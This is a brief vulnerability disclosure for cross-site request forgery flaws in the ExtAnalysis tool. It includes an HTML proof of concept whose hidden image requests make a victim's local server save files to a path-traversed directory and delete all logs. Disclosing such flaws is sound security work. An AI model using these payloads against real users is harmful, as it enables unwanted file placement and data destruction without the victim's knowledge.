Cross-Site Request Forgery (CSRF) in tuhinshubhra/extanalysis
Apr 3rd 2020
ExtAnalysis project is vulnerable against various CSRFs, that could lead to loss of functionalities and placement of malicious files in arbitrary directories without knowledge of the victim.
Proof of Concept (Credit: Mik317)
- Download the git project and run the server through the
- Insert on a malicious host the following code
<html> <!-- Downloads the Gmass extension in the `Desktop` folder. Fix: avoid `../` CSRF token --> <img src="http://127.0.0.1:13337/api/?query=dlanalysis&extid=ehomdgjhgmbidokdgicgmdiedadncbgf&savedir=../../../Desktop/hacked" /> <!-- Deletes all the log without knowledge of the victim. Fix: add CSRF token --> <img src="http://127.0.0.1:13337/api/?query=deleteAll" /> </html>